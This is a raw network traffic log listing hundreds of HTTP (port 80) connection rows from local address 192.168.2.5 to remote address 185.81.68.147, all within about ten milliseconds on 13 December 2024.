Dec 13, 2024 01:37:36.117259979 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117274046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117291927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117306948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117333889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117361069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117374897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117393970 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117409945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117429972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117444992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117465973 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117480040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117508888 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117535114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117535114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117552042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117563963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117585897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117599010 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117625952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117640018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117661953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117676973 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117698908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117713928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117736101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117749929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117774963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117789030 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117810011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117825031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117846012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117861032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117882013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117911100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117924929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117949963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117964029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.117990971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118053913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118067980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118086100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118099928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118123055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118138075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118160009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118174076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118196011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118210077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118417025 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118439913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118459940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118474960 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118490934 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118515968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118530989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118551016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118563890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118591070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118609905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118624926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118649006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118663073 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118685961 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118711948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118725061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118746042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118761063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118782043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118885994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118910074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.118937016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119016886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119040012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119066000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119083881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119147062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119168997 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119190931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119216919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119251966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119271040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119296074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119318008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119333029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119359016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119373083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119395971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119409084 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119436026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119451046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119626999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119651079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119683027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119700909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119724035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119739056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119760036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119774103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119798899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119812965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119833946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119848013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119863987 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119879961 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119901896 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119925976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119940042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119971037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.119997025 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120012045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120035887 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120049953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120157957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120183945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120201111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120223045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120234966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120306015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120328903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120345116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120378971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120429039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120459080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120486975 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120522022 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120551109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120572090 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120599985 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120626926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120651007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120665073 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120687008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120711088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120740891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120867014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120889902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120907068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120935917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120964050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.120992899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121006966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121030092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121042967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121071100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121084929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121107101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121120930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121143103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121162891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121187925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121202946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121225119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121238947 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121268034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121293068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121311903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121427059 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121443033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121474981 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121489048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121575117 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121576071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121603012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121628046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121642113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121671915 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121685982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121711969 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121742010 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121757984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121783972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121798038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121817112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121850014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121893883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121893883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121910095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121927977 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121954918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121970892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.121992111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122006893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122033119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122059107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122237921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122270107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122284889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122307062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122323036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122356892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122383118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122383118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122399092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122423887 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122437000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122462988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122478962 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122507095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122524977 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122551918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122565985 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122587919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122694016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122694016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122716904 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122740984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122755051 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122814894 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122845888 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122862101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122946978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122946978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122962952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.122987032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123003960 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123025894 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123049974 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123074055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123100042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123114109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123133898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123150110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123172998 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123189926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123217106 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123236895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123250961 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123414040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123469114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123490095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123516083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123529911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123555899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123583078 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123599052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123620033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123644114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123657942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123691082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123708010 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123737097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123815060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123842955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123876095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123898029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123910904 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123939037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.123951912 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124038935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124052048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124077082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124092102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124177933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124177933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124193907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124217033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124229908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124259949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124284029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124301910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124320984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124336958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124357939 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124382019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124394894 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124417067 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124432087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124454975 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124469995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124500036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124675035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124717951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124732018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124768972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124797106 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124816895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124830961 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124859095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124881983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124907970 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124922037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124949932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.124996901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.125061989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.125452042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.125474930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.125494957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.125533104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.125560045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.125586987 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.125601053 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.125621080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.125634909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.125659943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.125679016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.125704050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.125718117 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.125737906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.125762939 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.125783920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127505064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127505064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127505064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127505064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127505064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127505064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127505064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127505064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127533913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127533913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127533913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127533913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127533913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127533913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127533913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127533913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127553940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127553940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127553940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127553940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127553940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127553940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127553940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127553940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127573013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127573013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127573013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127573013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127573013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127573013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127573013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127573013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127590895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127590895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127590895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127590895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127590895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127590895 CET	49775	80	192.168.2.5	185.81.68.147
